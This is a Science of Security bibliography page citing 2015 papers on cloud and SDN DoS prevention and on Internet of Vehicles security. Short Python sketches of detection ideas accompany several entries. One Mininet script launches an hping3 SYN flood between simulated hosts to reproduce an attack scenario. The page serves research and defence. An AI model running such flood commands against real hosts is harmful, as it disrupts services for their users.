Kumara M A, A.; Jaidhar, C.D., "Hypervisor and Virtual Machine Dependent Intrusion Detection and Prevention System for Virtualized Cloud Environment," in Telematics and Future Generation Networks (TAFGEN), 2015 1st International Conference on, pp. 28-33, 26-28 May 2015. doi: 10.1109/TAFGEN.2015.7289570

Abstract: Cloud computing, enabled by virtualization technology, exhibits revolutionary change in IT infrastructure. The hypervisor is a pillar of virtualization, allowing resources to be shared among virtual machines. Vulnerabilities present in a virtual machine can be leveraged by an attacker to launch advanced persistent attacks such as stealthy rootkits, Trojans, Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks, etc. Virtual machines are prime targets for a malicious cloud user or attacker, as they are easily available for rent from a Cloud Service Provider (CSP). Attacks on a virtual machine can disrupt the normal operation of the cloud infrastructure. In order to secure the virtual environment, a defence mechanism at each virtual machine that identifies attacks in a timely manner is imperative. This work proposes an In-and-Out-of-the-Box Virtual Machine and Hypervisor based Intrusion Detection and Prevention System for virtualized environments that ensures a robust virtual machine state by detecting and then eradicating rootkits as well as other attacks. We conducted experiments using the popular open-source Host-based Intrusion Detection System (HIDS) called Open Source SECurity Event Correlator (OSSEC). Linux- and Windows-based rootkit, DoS attack, and file integrity verification tests were conducted, and all were successfully detected by OSSEC.

Keywords: Linux; cloud computing; computer network security; formal verification; virtual machines; CSP; DDoS attack; HIDS; IT Infrastructure; Linux; OSSEC; Windows based rootkits; cloud computing; cloud infrastructure; cloud service provider; defence mechanism; distributed denial of service attack; files integrity verification test; hypervisor; intrusion prevention system; open source host based intrusion detection system; open source security event correlator; persistent attacks; resource sharing; stealthy rootkit; trojan; virtual machines; virtualization technology; virtualized cloud environment; Computer crime; Databases; Intrusion detection; Kernel; Virtual machine monitors; Virtual machining; Cloud Computing; DoS Attack; Hypervisor; Intrusion Detection and Prevention System; Rootkit; Virtual Machine; Virtualization (ID#: 16-9058)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7289570&isnumber=7289553
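
The file-integrity portion of such a HIDS can be sketched in a few lines. The Python below illustrates the baseline-and-rescan idea behind OSSEC's syscheck in general terms; it is not OSSEC code, and the monitored path is an arbitrary example.

```python
# A minimal sketch of the file-integrity-checking idea behind OSSEC's syscheck
# (not OSSEC itself): hash monitored files into a baseline, then re-scan and
# report any file whose digest has changed.
import hashlib, pathlib

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def baseline(paths):
    return {p: digest(p) for p in map(pathlib.Path, paths) if p.is_file()}

def verify(base):
    for path, old in base.items():
        new = digest(path) if path.is_file() else None
        if new != old:
            print(f"integrity alert: {path} changed or removed")

base = baseline(["/etc/hosts"])   # monitored files are an illustrative choice
verify(base)                      # run periodically; silent if nothing changed
```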

 

Khadka, B.; Withana, C.; Alsadoon, A.; Elchouemi, A., "Distributed Denial of Service Attack on Cloud: Detection and Prevention," in Computing and Communication (IEMCON), 2015 International Conference and Workshop on, pp. 1-6, 15-17 Oct. 2015. doi: 10.1109/IEMCON.2015.7344496

Abstract: Cloud computing is a distributed and scalable computing architecture. It provides sharing of data and other resources, accessible from any part of the world at very low cost. However, security is one major concern for such a computing environment. A Distributed Denial of Service (DDoS) attack consumes all the resources a cloud may have, making them unavailable to other general users. This paper identifies characteristics of DDoS attacks and provides an Intrusion Detection System (IDS) tool based on Snort to detect DDoS. The proposed tool alerts the network administrator about any attack on any resource and the nature of the attack. It also suspends the attacker for some time to allow the network administrator to implement a fall-back plan. As Snort is an open-source system, modifying different parameters of the system showed significant gains, not only in detecting DDoS but also in reducing network down time. The proposed tool helps minimize the effect of DDoS by detecting the attack at a very early stage and by adjusting various parameters, which facilitates easy diagnosis of the problem.

Keywords: cloud computing; computer network security; public domain software; resource allocation; DDoS attack characteristics; IDS tool; cloud computing; cloud resources; distributed denial of service attack; distributive computing architecture; intrusion detection system tool; network admin; network administrator; open source system; scalable computing architecture; Cloud computing; Computer crime; Cryptography; Firewalls (computing); IP networks; Servers; DDoS; cloud computing; open-source; security; snort (ID#: 16-9059)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7344496&isnumber=7344420
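
The detection logic the abstract describes, alerting the administrator and temporarily suspending the attacker, can be sketched as a rate-based check. The Python below is a generic illustration; the window, threshold, and suspension values are assumptions rather than the paper's tuned Snort parameters.

```python
# Illustrative rate-based SYN-flood detection with a temporary suspension
# list (assumed parameters, not the authors' Snort configuration).
import time
from collections import defaultdict, deque

WINDOW, THRESHOLD, SUSPEND = 1.0, 100, 60.0   # seconds, SYNs/window, seconds

syns = defaultdict(deque)   # src_ip -> timestamps of recent SYNs
suspended = {}              # src_ip -> suspension expiry time

def on_syn(src_ip, now=None):
    now = now or time.time()
    if suspended.get(src_ip, 0) > now:
        return "drop"                          # attacker is in cool-off
    q = syns[src_ip]
    q.append(now)
    while q and q[0] < now - WINDOW:           # slide the window
        q.popleft()
    if len(q) > THRESHOLD:
        suspended[src_ip] = now + SUSPEND
        print(f"ALERT: possible SYN flood from {src_ip}")  # notify the admin
        return "suspend"
    return "allow"
```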

 

Singh, S.; Khan, R.A.; Agrawal, A., "Prevention Mechanism for Infrastructure Based Denial-of-Service Attack Over Software Defined Network," in Computing, Communication & Automation (ICCCA), 2015 International Conference on, pp. 348-353, 15-16 May 2015. doi: 10.1109/CCAA.2015.7148442

Abstract: In Software Defined Networking, a Denial-of-Service (DoS) or Distributed Denial-of-Service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Hence, protecting the network controller against attacks from within or outside the network is very important. Network devices in OpenFlow can also be targeted by attackers, so a prevention mechanism is required to keep packet forwarding running smoothly. In this research we compose an infrastructure-based DoS attack scenario over a software defined network, address the vulnerabilities in the flow table, and then develop a prevention mechanism to stop such attacks at an early stage, before they harm the network. The scenarios for the infrastructure-based DoS attack were developed using Mininet 2.2.0, and the simulation platform is Linux Ubuntu 14.10 Utopic Unicorn.

Keywords: computer network security; software defined networking; DDoS attack; Linux Ubuntu-14.10 Utopic Unicorn; Mininet 2.2.0; distributed denial-of-service attack; flow table vulnerabilities; infrastructure based DoS attacking scenario; network controller protection; network devices; open flow; prevention mechanism; smooth packet forwarding; software defined networking; Bandwidth; Computer crime; Floods; IP networks; Servers; Software defined networking; Denial of Service attack; Mininet; Open Flow; Software Defined Network (ID#: 16-9060)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7148442&isnumber=7148334
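
Since Mininet scenarios are themselves Python scripts, a minimal topology of the kind such an experiment needs might look like the sketch below. The exact topology, controller, and flood tool are assumptions, not the paper's setup; hping3 must be installed, and Mininet requires root privileges.

```python
#!/usr/bin/env python
# Minimal Mininet sketch (assumed scenario): three hosts on one OpenFlow
# switch, with h1 SYN-flooding h2 to exercise the switch's flow table.
from mininet.net import Mininet
from mininet.topo import SingleSwitchTopo
from mininet.cli import CLI

net = Mininet(topo=SingleSwitchTopo(k=3))     # hosts h1..h3 on switch s1
net.start()
attacker, victim = net.get('h1'), net.get('h2')
attacker.cmd('hping3 --flood -S -p 80 %s &' % victim.IP())  # start SYN flood
CLI(net)                        # inspect flow-table growth, then exit the CLI
attacker.cmd('pkill hping3')    # stop the flood before tearing down
net.stop()
```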

 

Alosaimi, Wael; Alshamrani, Mazin; Al-Begain, Khalid, "Simulation-Based Study of Distributed Denial of Service Attacks Prevention in the Cloud," in Next Generation Mobile Applications, Services and Technologies, 2015 9th International Conference on, pp. 60-65, 9-11 Sept. 2015. doi: 10.1109/NGMAST.2015.50

Abstract: Distributed Denial of Service (DDoS) attacks can affect the availability of networks. In the age of cloud computing, these attacks are becoming more harmful, both through their familiar effects and through new effects that harm cloud sustainability by exploiting its scalability and payment model (pay-as-you-use). A new form of DDoS attack has therefore been introduced in the cloud context as an economical version of the attack, known as the Economical Denial of Sustainability (EDoS) attack. To counteract such attacks, traditional network security means are used. Specifically, firewalls, which filter the packets incoming to the targeted network according to rules designated by administrators, can mitigate the impacts of DDoS and EDoS attacks. In this paper, a new solution called the Enhanced DDoS-Mitigation System (Enhanced DDoS-MS) is proposed to counter these attacks by utilizing firewall capabilities to control a verification process that protects the targeted system. These capabilities are evaluated in a simulation environment. The results show that the firewall successfully mitigates DDoS impacts, improving the services provided to users in terms of response time and server load under attack. The study also suggests a follow-up implementation of the proposed framework on an active testbed.

Keywords: Cloud computing; Computer crime; Floods; IP networks; Protocols; Servers; DDoS; Distributed Denial of Service attacks; EDoS; Economical Denial of Sustainability; cloud computing (ID#: 16-9061)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7373219&isnumber=7373199

 

Hillmann, Peter; Tietze, Frank; Rodosek, Gabi Dreo, "Tracemax: A Novel Single Packet IP Traceback Strategy for Data-Flow Analysis," in Local Computer Networks (LCN), 2015 IEEE 40th Conference on, pp. 177-180, 26-29 Oct. 2015. doi: 10.1109/LCN.2015.7366300

Abstract: Identifying the exact path that packets are routed on in the network is quite a challenge. This paper presents a novel, efficient traceback strategy named Tracemax in the context of a defense system against distributed denial of service (DDoS) attacks. A single packet can be directly traced over many more hops than existing techniques allow. In combination with a defense system, it differentiates between multiple connections, aiming to let non-malicious connections pass while bad ones are thwarted. The novel concept allows detailed analyses of the traffic and the transmission path through the network. The strategy can effectively reduce the effect of common bandwidth and resource consumption attacks, foster early warning and prevention, and increase the availability of network services for legitimate customers.

Keywords: Bandwidth; Computer crime; IP networks; Labeling; Ports (Computers); Reconstruction algorithms; Routing; Computer network management; Denial of Service; IP networks; IP packet; Packet trace; Traceback (ID#: 16-9062)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7366300&isnumber=7366232
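
The single-packet path-recording idea can be illustrated with a toy encoding. The sketch below is conceptual only; the field width and label format are illustrative, not Tracemax's actual packet layout.

```python
# Conceptual single-packet path recording: each router appends its small ID
# (here 1..63, six bits per hop) to a label carried in the packet, so the
# receiver can read the full transmission path from one packet.
HOP_BITS = 6

def record_hop(label, router_id):
    """Shift the label and append this router's ID (done at each hop)."""
    return (label << HOP_BITS) | (router_id & (2**HOP_BITS - 1))

def reconstruct(label):
    """Receiver-side: peel hop IDs off the label, last hop first."""
    path = []
    while label:
        path.append(label & (2**HOP_BITS - 1))
        label >>= HOP_BITS
    return list(reversed(path))

label = 0
for router in [7, 42, 13, 5]:      # packet traverses four routers
    label = record_hop(label, router)
print(reconstruct(label))          # -> [7, 42, 13, 5]
```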

 

AbdAllah, E.G.; Zulkernine, M.; Hassanein, H.S., "Detection and Prevention of Malicious Requests in ICN Routing and Caching," in Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on,  pp. 1741-1748, 26-28 Oct. 2015. doi: 10.1109/CIT/IUCC/DASC/PICOM.2015.262

Abstract: Information Centric Networking (ICN) is a new communication paradigm for the upcoming Next Generation Internet (NGI). ICN is an open environment that depends on in-network caching and focuses on contents rather than infrastructures or end-points as in current Internet architectures. These ICN attributes make ICN architectures subject to different types of routing and caching attacks. An attacker sends malicious requests that can cause Distributed Denial of Service (DDoS), cache pollution, and privacy violation of ICN architectures. In this paper, we propose a solution that detects and prevents these malicious requests in ICN routing and caching. This solution allows ICN routers to differentiate between legitimate and attack behaviours in the detection phase based on threshold values. In the prevention phase, ICN routers are able to take actions against these attacks. Our experiments show that the proposed solution effectively mitigates routing and caching attacks in ICN.

Keywords: Internet; computer network security; next generation networks; telecommunication network routing; DDoS; ICN architectures; ICN caching; ICN routing; Internet architectures; NGI; attack behaviours; cache pollution; caching attacks; detection phase; distributed denial of service; information centric networking; in-network caching; malicious requests detection; malicious requests prevention; next generation Internet; privacy violation; routing attacks; Computer architecture; Computer crime; Internet; Pollution; Privacy; Routing; Time factors; ICN routing and caching attacks; Information centric networking (ID#: 16-9063)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363308&isnumber=7362962
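
The threshold-based detection phase can be sketched simply: track, per incoming face, how many interests go unsatisfied, and mark a face malicious once the ratio crosses a threshold. The Python below is a generic illustration; the threshold and minimum sample size are assumptions, not the paper's values.

```python
# Illustrative threshold detection for an ICN router: a face whose ratio of
# unsatisfied (timed-out) interests crosses THRESHOLD is treated as attacking
# and can be rate limited in the prevention phase.
from collections import defaultdict

THRESHOLD = 0.8     # unsatisfied-interest ratio that marks a face malicious
MIN_SAMPLE = 50     # don't judge a face on too few interests

stats = defaultdict(lambda: {"sent": 0, "unsatisfied": 0})

def on_interest(face):
    stats[face]["sent"] += 1

def on_timeout(face):
    stats[face]["unsatisfied"] += 1

def is_malicious(face):
    s = stats[face]
    return s["sent"] >= MIN_SAMPLE and s["unsatisfied"] / s["sent"] > THRESHOLD
```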


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Internet of Vehicles 2015

 

 
SoS Logo

Internet of Vehicles 2015

 

The term “Internet of Vehicles” refers to a system of the Internet of Things related to automobiles and other vehicles.  It may include Vehicular Ad-hoc Networks (VANETs).  For the Science of Security community, it is important relative to cyber physical systems, resilience, human factors and metrics.  The work cited here was presented in 2015.


Huiyong Li; Yuanrui Zhang; Yixiang Chen, "PSTEP - A Novel Probabilistic Event Processing Language for Uncertain Spatio-temporal Event Streams of Internet of Vehicles," in Software Quality, Reliability and Security - Companion (QRS-C), 2015 IEEE International Conference on, pp. 161-168, 3-5 Aug. 2015. doi: 10.1109/QRS-C.2015.43

Abstract: The Internet of Vehicles (IoV) is a typical system of the Internet of Things. Spatio-temporal event streams are one of the basic features of IoV. These event streams are often uncertain due to the limits of monitoring devices and the high speed of vehicles. Developing an event processing language for such spatio-temporal event streams with uncertainty is a challenging issue. The goal of this paper is to develop a probabilistic event processing language, called the Probabilistic Spatio-Temporal Event Processing language (PSTEP), to address this challenge. In PSTEP, we use the Possible World Model to express uncertain spatio-temporal events of IoV and assign each spatio-temporal event a probability, which serves as the threshold value for processing the existence of an event. We establish its syntax and operational semantics. Finally, a case study is given to show the effectiveness of the PSTEP language.

Keywords: Internet; probability; uncertain systems; Internet of Vehicles; IoV; PSTEP language; possible world model; probabilistic spatio-temporal event processing language; uncertain spatio-temporal event streams; Data models; Intelligent vehicles; Internet of things; Monitoring; Probabilistic logic; Spatial databases; Syntactics; Event Processing Language; Event-Driven Architecture; Formal Semantics; Internet of Things; Internet of Vehicles; Mobile System; Uncertain Event (ID#: 16-9232)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7322138&isnumber=7322103

 

Ben Jaballah, W.; Conti, M.; Mosbah, M.; Palazzi, C.E., "Impact of Security Threats in Vehicular Alert Messaging Systems," in Communication Workshop (ICCW), 2015 IEEE International Conference on, pp. 2627-2632, 8-12 June 2015. doi: 10.1109/ICCW.2015.7247575

Abstract: The automotive industry is about to take a cutting-edge step in vehicular technologies by letting vehicles communicate with each other, creating an Internet of Things composed of vehicles, i.e., an Internet of Vehicles (IoV). In this context, information dissemination is very useful for supporting safety-critical tasks and ensuring the reliability of the vehicular system. However, the industrial community has focused more on safe driving and left security as an afterthought, leading to the design of insecure vehicular and transportation systems. In this paper, we address potential security threats to vehicular safety applications. In particular, we focus on a representative vehicular alert messaging system and point out two security threats. The first concerns a relay broadcast message attack that forces honest nodes not to collaborate in forwarding the message. The second focuses on interrupting message relaying to degrade network performance. Finally, we run a thorough set of simulations to assess the impact of the proposed attacks on vehicular alert messaging systems.

Keywords: Internet of Things; automobile industry; electronic messaging; security of data; Internet of Things; automotive industry; information dissemination; relay broadcast message attack; security threats; vehicular alert messaging systems; Conferences; Delays; Internet of things; Relays; Safety; Security; Vehicles (ID#: 16-9233)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7247575&isnumber=7247062

 

Chatrapathi, C.; Rajkumar, M.N.; Venkatesakumar, V., "VANET Based Integrated Framework for Smart Accident Management System," in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, pp. 1-7, 25-27 Feb. 2015. doi: 10.1109/ICSNS.2015.7292411

Abstract: The number of vehicles on the road has increased dramatically in recent years, and accidents are a major cause of death in most countries. Despite vast developments in traffic management systems and automotive technologies, the number of accidents increases day by day. In most accidents, the lack of quick first aid and timely medical service is the cause of loss of life. Hence it is necessary to develop a common framework for detecting accidents, avoiding secondary accidents, alerting first responders in a timely manner, and optimizing the traffic for the first responder (ambulance). In our approach we combine the emerging Internet of Things (IoT) and VANET to propose a framework for accident alerting and traffic optimization for ambulances. Our approach provides a reliable, autonomous framework that allows vehicles, ambulances, and hospitals to establish and maintain their network themselves. It reduces the time lost in alerting an ambulance and in traffic congestion, and increases the chance of saving the lives of accident victims.

Keywords: Internet of Things; traffic engineering computing; vehicular ad hoc networks; Internet of Things; IoT; VANET based integrated framework; automotive technologies; smart accident management system; traffic management system; Accidents; Heuristic algorithms; Hospitals; Roads; Servers; Vehicles; Vehicular ad hoc networks; Body Area Networks (BAN); Internet of Things (IoT); VANET; accident detection; traffic management (ID#: 16-9234)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292411&isnumber=7292366

 

Santa, J.; Fernandez, P.J.; Pereniguez, F.; Bernal, F.; Skarmeta, A.F., "A Vehicular Network Mobility Framework: Architecture, Deployment and Evaluation," in Computer Communications Workshops (INFOCOM WKSHPS), 2015 IEEE Conference on, pp. 127-132, April 26 2015-May 1 2015. doi: 10.1109/INFCOMW.2015.7179372

Abstract: Research on vehicular networks has increased for more than a decade; however, the involved technologies have only recently reached maturity, and standards/specifications in the area are being released these days. Although there are a number of protocols and network architecture proposals in the literature, above all in the Vehicular Ad-hoc Network (VANET) domain, most of them lack realistic designs or present solutions far from being interoperable with the Future Internet. Following the ISO/ETSI guidelines in the field of (vehicular) cooperative systems, this work addresses the problem by presenting a vehicular network architecture that integrates well-known Internet Engineering Task Force (IETF) technologies successfully employed on the Internet. More precisely, this work describes how Internet Protocol version 6 (IPv6) technologies such as Network Mobility (NEMO), Multiple Care-of Address Registration (MCoA), IP Security (IPsec), and Internet Key Exchange (IKE) can be used to provide network access to in-vehicle devices. A noticeable contribution of this work is that it not only offers an architecture/design perspective, but also details a deployment viewpoint of the system and validates its operation in a real performance evaluation carried out on a Spanish highway. The results demonstrate the feasibility of the solution, and the developed testbed can serve as a reference in future vehicular network scenarios.

Keywords: IP networks; Internet; intelligent transportation systems; mobile computing; mobility management (mobile radio); protocols; telecommunication security; vehicular ad hoc networks; IETF technologies; IKE; IP security; IPsec; IPv6 technologies; ISO/ETSI; Internet Protocol version 6; Internet engineering task force technologies; Internet key exchange; MCoA; NEMO; Spanish highway; VANET; cooperative systems; future Internet; multiple care-of address registration; network architecture protocols; vehicular ad-hoc network; vehicular network mobility framework; Computer architecture; Internet; Roads; Security; Telecommunication standards; Vehicles; 802.11p; IPv6; Intelligent Transportation Systems; V2I; testbeds; vehicular networks (ID#: 16-9235)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7179372&isnumber=7179273

 

Axelrod, C.W., "Enforcing Security, Safety and Privacy for the Internet of Things," in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, pp. 1-6, 1-1 May 2015. doi: 10.1109/LISAT.2015.7160214

Abstract: The connecting of physical units, such as thermostats, medical devices and self-driving vehicles, to the Internet is happening very quickly and will most likely continue to increase exponentially for some time to come. Valid concerns about security, safety and privacy do not appear to be hampering this rapid growth of the so-called Internet of Things (IoT). There have been many popular and technical publications by those in software engineering, cyber security and systems safety describing issues and proposing various “fixes.” In simple terms, they address the “why” and the “what” of IoT security, safety and privacy, but not the “how.” There are many cultural and economic reasons why security and privacy concerns are relegated to lower priorities. Also, when many systems are interconnected, the overall security, safety and privacy of the resulting systems of systems generally have not been fully considered and addressed. In order to arrive at an effective enforcement regime, we will examine the costs of implementing suitable security, safety and privacy and the economic consequences of failing to do so. We evaluated current business, professional and government structures and practices for achieving better IoT security, safety and privacy, and found them lacking. Consequently, we proposed a structure for ensuring that appropriate security, safety and privacy are built into systems from the outset. Within such a structure, enforcement can be achieved by incentives on one hand and penalties on the other. Determining the structures and rules necessary to optimize the mix of penalties and incentives is a major goal of this paper.

Keywords: Internet of Things; data privacy; security of data; Internet of Things; IoT privacy; IoT safety; IoT security; cyber security; software engineering; Government; Privacy; Safety; Security; Software; Standards; Internet of Things (IoT); privacy; safety; security; software liability; system development lifecycle (SDLC); time to value; value hills; vulnerability marketplace (ID#: 16-9236)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160214&isnumber=7160171

 

Razzaque, M.A.; Clarke, S., "A Security-Aware Safety Management Framework for IoT-Integrated Bikes," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 92-97, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389033

Abstract: Bike and vehicle collisions often result in fatalities to vulnerable bikers. Technology can protect such vulnerable road users. Next-generation smart bikes with sensing, computing, and communication capabilities, or bikes paired with bikers' smartphones, have the potential to be integrated in an Internet of Things (IoT) environment. Unlike the avoidance of inter-vehicle collisions, very limited effort has been made on IoT-integrated bikes and vehicles to avoid bike-vehicle collisions and ensure bikers' safety. Moreover, IoT-integrated bikes and vehicles will create new and different information and cyber security risks that could make existing safety solutions ineffective. To exploit the potential of IoT in an effective way, especially for bikers' safety, this work proposes a security-aware bikers' safety management framework that integrates a misbehavior detection scheme (MDS) and a collision prediction and detection scheme (CPD). The MDS, in particular for vehicles (as vehicles are mainly responsible for most bike-vehicle collisions), provides security awareness using in-vehicle security checking and misbehavior detection based on vehicles' mobility patterns. The MDS also includes in-vehicle monitoring of driver behavior to identify potentially misbehaving drivers. The framework's MDS and CPD rely on improved versions of some existing solutions. Use cases of the framework demonstrate its potential for providing biker safety.

Keywords: Internet of Things; bicycles; mobility management (mobile radio); road safety; smart phones; telecommunication security; CPD scheme; Internet of Things environment; IoT environment; IoT-integrated bikes; MDS; behavior monitoring; bike collisions; bike-vehicle collisions; collision prediction and detection scheme; cyber security risks; in-vehicle security checking; information risks; mobility-patterns-based misbehavior detection; next generation smart bikes; security-aware bikers safety management framework; security-awareness; smartphones; vulnerable road users; Cloud computing; Estimation; Roads; Security; Trajectory; Vehicles; Bikers' Safety; Bikes; Collision Prediction and Detection; Security; V2X communication (ID#: 16-9237)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389033&isnumber=7389012
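
As a worked example of the kind of computation a collision prediction scheme performs (the paper's own CPD design is not detailed in the abstract), the sketch below estimates time-to-collision from relative position and velocity; the warning threshold and sample values are illustrative.

```python
# Time-to-collision sketch: find the earliest time the bike and vehicle come
# within `radius` metres of each other, assuming constant velocities.
import math

def time_to_collision(p_bike, v_bike, p_car, v_car, radius=2.0):
    px, py = p_car[0] - p_bike[0], p_car[1] - p_bike[1]   # relative position
    vx, vy = v_car[0] - v_bike[0], v_car[1] - v_bike[1]   # relative velocity
    a = vx * vx + vy * vy
    if a == 0:
        return None                      # no relative motion
    b, c = 2 * (px * vx + py * vy), px * px + py * py - radius * radius
    disc = b * b - 4 * a * c
    if disc < 0:
        return None                      # paths never come that close
    t = (-b - math.sqrt(disc)) / (2 * a)
    return t if t >= 0 else None

ttc = time_to_collision((0, 0), (5, 0), (50, -3), (-10, 1))
if ttc is not None and ttc < 4.0:
    print(f"warning: predicted collision in {ttc:.1f} s")
```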

 

Gantsou, D., "On the Use of Security Analytics for Attack Detection in Vehicular Ad Hoc Networks," in Cyber Security of Smart Cities, Industrial Control System and Communications (SSIC), 2015 International Conference on, pp. 1-6, 5-7 Aug. 2015. doi: 10.1109/SSIC.2015.7245674

Abstract: A vehicular ad hoc network (VANET) is a special kind of mobile ad hoc network built on top of the IEEE 802.11p standard for better adaptability to the wireless mobile environment. As it supports both vehicle-to-vehicle (V2V) and vehicle-to-infrastructure (V2I) communications, and connects vehicles to external resources including cloud services, the Internet, and user devices while improving road traffic conditions, VANET is a key component of intelligent transportation systems (ITS). As such, VANET can be exposed to cyber attacks related to the wireless environment, and to those of the traditional information technology systems it is connected to. However, when looking at solutions that have been proposed to address VANET security issues, it emerges that guaranteeing security in VANET essentially amounts to resorting to cryptographic-centric mechanisms. Although the use of a public key infrastructure (PKI) fulfills most VANET security requirements related to the physical properties of wireless transmissions, simply relying on cryptography does not secure a network. This is the case for vulnerabilities at layers above the MAC layer: because of their capability to bypass security policy controls, they can still expose VANET, and thus the ITS, to cyber attacks. One therefore needs security solutions that go beyond cryptographic mechanisms in order to cover the multiple threat vectors faced by VANET. In this paper, focusing on attack detection, we show how Sybil nodes can be detected, regardless of the VANET architecture, using an implementation that combines observation of events and incidents from multiple sources at different layers.

Keywords: intelligent transportation systems; telecommunication security; vehicular ad hoc networks; IEEE802.11p standard; VANET; attack detection; cryptographic-centric mechanisms; cyber attacks; intelligent transportation systems; mobile ad hoc network; security analytics; vehicular ad hoc networks; wireless mobile environment; Communication system security; Cryptography; IP networks; Vehicles; Vehicular ad hoc networks; Intelligent Transportation Systems (ITS); Vehicular ad hoc network (VANET) security; attack detection (ID#: 16-9238)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7245674&isnumber=7245317

 

Sadeghi, A.-R.; Wachsmann, C.; Waidner, M., "Security and Privacy Challenges in Industrial Internet of Things," in Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, pp. 1-6, 8-12 June 2015. doi: 10.1145/2744769.2747942.

Abstract: Today, embedded, mobile, and cyberphysical systems are ubiquitous and used in many applications, from industrial control systems, modern vehicles, to critical infrastructure. Current trends and initiatives, such as “Industrie 4.0” and Internet of Things (IoT), promise innovative business models and novel user experiences through strong connectivity and effective use of next generation of embedded devices. These systems generate, process, and exchange vast amounts of security-critical and privacy-sensitive data, which makes them attractive targets of attacks. Cyberattacks on IoT systems are very critical since they may cause physical damage and even threaten human lives. The complexity of these systems and the potential impact of cyberattacks bring upon new threats. This paper gives an introduction to Industrial IoT systems, the related security and privacy challenges, and an outlook on possible solutions towards a holistic security framework for Industrial IoT systems.

Keywords: Internet of Things; data privacy; embedded systems; industrial control; mobile computing; security of data; Industrie 4.0; business models; cyberattacks; cyberphysical system; embedded system; industrial Internet of Things; industrial IoT systems; industrial control systems; mobile system; privacy-sensitive data; security-critical data; user experiences; Computer architecture; Privacy; Production facilities; Production systems; Security; Software (ID#: 16-9239)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167238&isnumber=7167177

 

Aggarwal, M.; Katal, A.; Prabhakar, R., "Bus Locator: Application for Time Management and Security," in Advances in Computing and Communication Engineering (ICACCE), 2015 Second International Conference on, pp. 519-523, 1-2 May 2015. doi: 10.1109/ICACCE.2015.134

Abstract: Due to the increase in crimes like abduction, persistent attacks, etc., the personal security and safety of passengers is becoming more and more important to families, organizations, and government. It has been noticed that most abductions occur at bus stops where passengers are waiting for their respective vehicles. The mismatch between the schedules of the vehicles and the passengers gives the culprits an edge to commit the crime. In this paper we discuss the troubles faced by passengers waiting for vehicles because of this timing mismatch, which leads to poor time management and an increase in security attacks. To solve this problem we have developed an Android-based application that helps passengers keep themselves updated about the current location of the vehicle. Our approach is different in that the information is sent through text messages, requiring neither Internet connectivity nor an Android phone on the passenger's side. Passengers waiting at their respective stops will be able to know where the vehicle has reached, helping them manage their time and ensuring their security and safety.

Keywords: law; safety; security; time management; traffic engineering computing; bus locator; crime; passengers safety; personal security; security attacks; time management; Layout; Mobile communication; Security; Smart phones; Vehicles; Android Bus Locator; location Listener; Main Activity; SmsManager; Start Service; Stop Service Algorithms (ID#: 16-9240)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7306740&isnumber=7306547

 

Becsi, T.; Aradi, S.; Gaspar, P., "Security Issues and Vulnerabilities in Connected Car Systems," in Models and Technologies for Intelligent Transportation Systems (MT-ITS), 2015 International Conference on, pp. 477-482, 3-5 June 2015. doi: 10.1109/MTITS.2015.7223297

Abstract: The Connected Revolution has reached the automotive industry, and the Internet is penetrating modern vehicles. Formerly, acquiring data from a vehicle was the domain of Fleet Management Systems handling commercial vehicles. In recent years, connectivity has begun to appear in passenger vehicles as well. The first features were infotainment and navigation, which have low security needs and remain far from the vehicular networks. Then telematics and remote control features, such as keyless entry, appeared and created new security threats in the vehicle. The paper shows how connected features change the vehicle and presents the vulnerabilities of each element to show the importance of cautious system security design.

Keywords: automobiles; intelligent transportation systems; security of data; vehicular ad hoc networks; Internet; automotive industry; connected car systems; connected revolution; fleet management systems; infotainment; keyless entry; navigation; passenger vehicles; remote control; security issues; security threat; security vulnerabilities; system security design; telematics; vehicular networks; Internet; Logic gates; Mobile communication; Mobile handsets; Security; Vehicles; Wireless communication; Connected Car; Security (ID#: 16-9241)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7223297&isnumber=7223230

 

Zhuo Bi; Deji Chen; Cheng Wang; Changjun Jiang; Ming Chen, "Adopting WirelessHART for In-vehicle-Networking," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1027-1030, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.244

